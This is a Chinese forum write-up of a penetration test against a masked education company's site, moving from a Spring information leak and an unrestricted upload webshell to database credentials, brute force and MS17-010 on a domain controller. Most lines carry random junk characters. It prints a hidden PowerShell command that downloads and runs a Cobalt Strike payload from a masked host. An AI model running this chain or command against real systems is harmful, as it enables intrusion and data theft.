2 T$ N- Q9 O. u3 n* S1 o
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
/ E* _- A1 ?! p6 s% m
5 y5 A, h. \% r$ {) A
4 i2 {3 U9 g ?$ t. @9 g 2 I( x: b7 D' |, m: {3 k
# a5 {% X( b) Q- j3 h
0 X& D) T1 v+ x 正文* h& @! M( ?* T
! n8 f* @* `+ H+ c6 F
3 S5 M- t! M7 Y" |" D
2 k& | K. ]. R( H8 Y9 y # D" e7 V2 M+ ^
* K$ y6 w8 k4 S- X
目标:www.xxxx.com(一家教育机构) - ?! j' x; s4 R2 [
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能1 J7 i% W7 s. ]( ~
1 }8 \* u+ s8 n6 m4 V
w% J7 z8 u9 M; l; x / u* s5 Y+ s) A) y# f
a1 X1 s9 C! V% O# O: ?4 {8 v+ b
: D. y2 v0 q- W: l/ } 进行了简单的信息搜集 ) ]+ n1 J6 k& T) Y V, G3 G) k
, S3 Z" ]7 e: w9 U+ I6 Y7 X+ x
7 G4 o, [% _& y" f
j X: U/ f9 p/ \& M& g, R/ b$ b, q3 |5 X0 d. j
子域名搜集
0 A% v9 _ S8 \' F. i 3 u6 s6 r% P6 s3 Q1 C
$ Z' Y, F* ]0 Z$ m6 v' o4 k& s
: Q; A- Z5 |+ ^
; I1 `0 ^% ]0 P6 x% ^* H8 ~0 }, ?* g1 O4 A% n, u& B& z# D" m
fofa找资产 & I- _+ D3 l6 L
" N2 G2 d& L2 O4 o% ^' r9 ^* X
$ t! x0 K1 i' c: f% U
! A* K. e. f% Q
6 I9 f' h+ b! w& F" p. a
$ r! w. |4 n! D# k1 {4 M1 P 6 A. J/ m2 o+ J$ z+ E+ Y
7 m3 Y* B3 B* J# e G7 a% ]
一共七个资产。去重之后只有两个。 - E6 n! V0 Z. c" Z |
8 \: Y2 L2 z6 m+ U# u
" K2 W! K. u& f( R6 W1 q( F) Z * `, ?& d& E5 D
8 X, K6 z- Y# b* [ C/ c! M$ S* { 目录探测
: _* R' }" D, |$ X$ ^9 T ' q6 o6 `2 S& k3 X/ {0 `: `
* [' p/ l/ c$ z) A
9 w8 L7 N: I9 l0 {- r1 @- }1 T7 s
; H# P' k0 ]" Z( }1 |/ b, d6 ]
4 _+ R- i0 |4 _$ H; p1 F* Z! D. P3 Y 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 ! i7 r; i R! g2 G% V5 ^/ Q
, C- c* V b5 c6 K
; z6 v3 }& V7 I' @
4 B3 y( S7 d( d9 M& U x
; q m" |4 V* s$ i 我又尝试了通过修改返回包来绕过登录界面2 H. I6 k8 d2 T+ F1 S! |. c
. a+ P, B/ ~, |9 P& c
( R. ?5 `7 i+ R4 X; u- u
" A1 N3 f6 |; w9 w ' M6 T2 p9 `( W- ^7 }: E: e; W
2 K, F( W* Y+ d# Q; Z; ^* i2 K 还是不行,尝试注入无果
3 E6 M7 ]! ]) S2 W# ~( R
# H& M9 c3 K' \- P% a6 C" G; v, j% E
}: L7 x# y' S. D1 t( b, Q
. g1 j' o1 A$ m N( E1 c9 o; o: ~# p) n; I/ e: o0 Z2 p
不过我目录探测出了一处Spring信息泄露 0 ]' b3 i) F9 {: g
/ H9 A+ ^8 [/ Z
% f! A' i1 }/ H' i
4 h5 A# B* [0 `. T' f, w( U- v
8 P. u& N w# _0 B6 A/ A! G
$ T+ j9 u3 t/ |0 M( E6 s, }" [
8 F6 e( y1 ^! b* {
k7 i8 |0 B/ [; P 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录* P0 C5 p3 u, {- R
& k3 T9 e0 a! l, F
! q8 e5 |8 s- z# C$ p1 Y 6 V& B0 \- E4 `# u& a
; \" s# E/ @8 d- r C- a
8 W4 o1 y7 S% W+ B: D 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。" j1 j0 \* b- m2 f( W9 Y$ A: u# T7 P9 \
9 G# _2 o0 s1 M5 q3 E( t& J( j4 [8 [4 A& E2 ^0 [, o( ]! o: x
4 `( s( K; ?* I" R' w
' O1 ] ]$ ], }7 W0 M! X$ s F" X
- e3 {- K) S0 l6 f9 z/ r( ^
获取有些师傅到这一步就手机抓包电脑测了。& ~3 K+ h- U& C/ C( ^0 C. d2 l" t! Q/ M
$ v! N8 q( H4 |: y) ]
: l2 w6 k P7 D1 D; ^ Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
# M0 s$ f' u6 C$ j' ]# V . y: `$ L7 I" o8 q5 W
. c% J3 A/ d4 r6 C& } 其中在一个公众号发现了小程序,可以进行注册。
2 n! D* b7 {* @3 Y- ^
: G- p& s6 P) O' j( W! N! i0 P) d5 ?3 \# K* P+ L2 ~! c" F
看到了头像上传,尝试上传获取WebShell
& S* R' _* \% N. x1 P+ n ! C& r& h. w3 y) P7 V. V
; L$ I1 M E) q$ ` 7 W9 g3 j0 I3 ~. P, n. y; y8 {
! O9 o! a5 j8 M7 c# ~* [
& n. ?- {% h2 @) |7 `+ i 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
/ W! a5 V* P: x3 Y3 W" E5 H9 E $ T5 |4 E# z2 |( y0 u
% ?2 \# u! K* k' V6 _( P/ L
! p1 z) K7 a0 C: K; f - q) o- ~. ~- k7 s+ T! t
$ v* H5 y5 t/ |# r2 c/ V1 T& S7 Q* ~; X 然后上了大马
' F. i- C# b- R
' P" D* X1 J. L) g
* ]; I/ J9 U# P( [1 y/ v $ m& \. O7 L+ t& S9 N# \
% g; z* D: m7 ^0 {) ?/ S1 u8 T3 {- a0 R' x4 `& U; h, n N8 l
% p# p9 I/ ]( B( V
7 [( [" r) F9 H! `
+ ~4 t. }' P3 H/ ]8 n& R 通过翻找文件发现数据库账号密码
1 e! Z0 \' g) T4 X2 e G9 p5 u4 @
" J- u, Z% e( b9 p4 f# R1 t$ \- \
2 T$ ~3 U7 g) \/ n , o D' f, {: f3 y
3 V9 B. R9 H" N- }' L, v1 q# K }8 b4 c( _5 A: Q# O% v
--内网渗透% R* V2 W; J. K: t7 A1 |* R
( F) z6 M/ D2 T6 e5 @5 R" [1 {- A/ L+ ?+ m/ Q1 y
直接通过powershell执行 cs上线
: x* N* K$ q% _+ f* ^$ q h! ` 7 d5 r+ s2 B$ b: ~# l) h
3 P- W1 B& u- u1 ?
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))") p& s9 |# N _2 E
% _+ |# r3 r4 n" A# W& o8 ^
6 j8 k. A+ q3 d( w: @ 1 X8 w, z4 j" l5 `1 P
5 G3 S# Z f2 @- q/ n" e6 c' `: x! i8 ]3 X3 T
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破$ m# B9 i$ I+ i* ~) n; _
: F6 K/ J, E! N: \1 O* q, B, G0 D/ z/ o7 J) _
2 [9 D- ^9 }5 ?5 N; J7 c 4 g. ]/ J" m+ s2 _( M0 Z' l; x
0 _7 }5 G/ r8 _: u- Q
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 8 @' c' w% Y; ^
5 P6 q2 X" D) Y: s+ u4 \5 K3 M
+ _! m4 i) v9 Q& a7 M5 l) l2 m+ }: G- s1 K! d* Y0 k, v: [. ?/ c
) X7 N& S3 \. h" z6 F( x( L
9 u9 C- A/ ?- w9 f% C9 V
/ h( g7 Y& b! y4 ?: \2 a ( A' y1 N$ J x3 K
8 L" ^* p6 F& {- |* f4 G# a- V' N
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
+ B" Z2 S0 ]( O# h+ s1 q
* P" b, K* G0 d0 w5 E/ B! o
: B$ ~" U3 i* V1 a3 v' g5 |( } 1 x. T- n2 N& T6 w+ z" M1 w
4 B7 O; x1 n% `! Y9 G8 z5 i8 ]1 L " D9 J. F, F5 `! F7 f. B) t
S3 `( x. V X2 q; ?
, Q$ n! [1 Y! m" i2 J( G * L+ V2 P' v1 I. I
7 [% K- E" D: J: I% V) e# y
2 y( K f0 `7 Z8 M ) A- z5 ^7 E2 {8 K/ {! @
4 h! c+ w9 Q% g
$ \: M" I' S, Y! K! l; m% z i 9 h% c9 {% D' p) J0 Q3 p& E
$ C" i' _+ B8 c) H2 p1 N3 {
小结3 x) _! F" ~6 R
* ^9 V' N& q8 I3 n" D; ^6 L
0 S' G* C4 v B- ^. {' O1 o
9 f4 e) {) n% X W* l5 p! B" ^ 1 w1 P! D0 p7 z: a$ B
5 x7 [' ^+ X' q0 C) [: I$ r 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
: L; d7 n! n/ B: h# Q4 | ( n H6 C, ^# \1 q! i% n0 C
# D6 L: Z, e4 s" z7 J2 G7 V, ]( L/ N
+ i$ d2 J8 X+ V- k# ^ i0 b L" r $ O" I; t' r( @& b+ k' @1 {8 o: A- d
! J& O% F8 A9 A4 P( w3 p -
3 h- j/ O& \4 l2 n0 ~% n* ?
" Y# D) r6 ?- i) m+ o2 m
' P) |& j0 e2 k1 G) \8 W8 Y! ^8 T) Z - 7 w! b" a8 r$ b, h
# ^9 C6 O! r3 F$ s
t# K* f* \" B* L. |. @
7 ^% w) Q$ H, @0 `" J2 N; b5 {* h9 p/ {4 w/ v9 E( E( f
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
' v' u4 b9 A% }
0 R/ ^' M0 V" Z1 K& o" o4 a. m9 |7 X# c3 K1 S* Z! B4 D- B1 Y
a4 @; e6 O* H |